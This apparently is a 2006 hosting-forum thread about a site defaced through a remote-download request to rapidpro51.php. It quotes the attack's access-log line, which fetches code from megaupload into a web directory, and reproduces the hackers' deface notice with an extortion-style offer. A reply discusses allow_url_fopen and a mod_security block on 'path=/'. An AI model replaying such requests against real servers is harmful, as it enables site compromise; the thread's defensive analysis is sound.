WARNING: Downloadable Shell Exploit

jackie46

BANNED
Jul 25, 2005
537
0
166
One of our user websites was hacked and defaced even with the latest mod_security rules in place. Seems like there is a new way to download php shell scripts to a users directory then executing it.

195.239.108.61 www.site.com - [04/Apr/2006:12:16:38 -0400] "GET /rapidpro51.php?link=http%3A%2F%2Fwww.megaupload.com%2Fru%2F%3Fd%3DD6DOKVCP&comment=&email=&method=tc&partSize=10&proxy=&path=%2Fhome%2Fstitadd4%2Fpublic_html%2Fimages%2Fdvd HTTP/1.1" 200 12933 "http://www.site.com/rapidpro51.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "hotlog=1"

Seems like this command could be executed on anyone website which would lead to a site or entire server compromise.

We need a mod_security rule for this one.

They also download a script called z12sh.php which was the actual shell script executed to hack the site. Needless to say, i ran this script and was horrified at all the information is showed me about my server not to mention the disabled functions in php ini eg php_shell,dl,passthru etc did nothing to stop the execution of the script.

V.I.P HACKER DEFACE

-{Z12-HACKER-GROUP-IS-V.I.P. TEAM}-

This SITE HACKED BY

Mr. Gh0ster

English DEFACE VERSION

Because of numerous unsecurity positions of your site has been made DEFACE.

Safety this the most important on the Internet.

You can have for small money ours security support.

For this purpose write the letter on our E-mail.

On a regular basis visit ours private a site on the Internet!

[email protected]

Ðóññêàÿ âåðñèÿ ÄÅÔÅÉÑÀ!!!

Èç-çà ìíîãî÷èñëåííûõ äûðîê â áåçîïàñíîñòè âàøåãî ñàéòà, áûë ñäåëàí åãî ÄÅÔÅÉÑ!

Áåçîïàñíîñòü - ñàìîå ãëàâíîå â Èíòåðíåòå.

Çà íåáîëüøèå äåíüãè ÂÛ ìîæåòå ïîëó÷èòü íàøó, ÕÀÊÅÐÑÊÓÞ, 100%-íóþ ïîääåðæêó áåçîïàñíîñòè.

Äëÿ ýòîãî íàïèøèòå ïèñüìî íà íàø å-ìåéë.

Ðåãóëÿðíî ïîñåùàéòå íàø ëè÷íûé ñàéò â Èíòåðíåòå! ÒÀÌ ÅÑÒÜ ÂѨ =)



0 1 0 0 0 1 1 0 0 0 0 0 0 1 0 0 1 1 0 0 0 1 0 1 1 1 1 1 0 1 0 0 0 1 1 0 0 1 0 1 0 1 0 1 1 1 1 0 0 0 1 0 1 1 1 1 1 0 1 0 1 0 1 0 0 1 0 1 0 1 1 1 0 0 0 1 0 1 1 0 0 1 1 1 0 1 0 0 1 1 0 1 0 1 1 0 1 1 1 0 0 0 0 0 1 0 0 1 1 1 1 1 1 1 1 0 0 1 1 1 0 0 1 0 1 0 0 1 0 0 1 0 0 1 1 0 1 1 (C) Z12 HACKER GROUP, 2006
 
Last edited:

jamesbond

Well-Known Member
Oct 9, 2002
738
1
168
GET /rapidpro51.php?link=http://www.megaupload.com/ru/?d=D6DOKVCP&comment=&email=&method=tc &partSize=10&proxy=&path=/home/stitadd4/publ ic_html/images/dvd HTTP/1.1" 200 12933 "http://www.site.com/rapidpro51.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "hotlog=1"


Is this site running a custom made script? If not, what software is this site running on?

The 'hackers' included their url using the link variable (see link=http://...), which means allow_url_fopen is not disabled on your server or that account.

Blocking link=http through mod_security is not an option here I think, because that might break their script (just a guess, since I don't know what it's supposed to do)

Blocking megaupload.com or filenames through mod_security is pointless, since they can place their scripts on thousands of locations and name them whatever they want to name them.

You could try blocking requests for "path=/", don't think that will cause false positives.

It's nearly impossible to write mod_security rules for these type of attacks without generating false positives, especially with custom made scripts. If the script is exploitable then it should be fixed asap.
 
Last edited: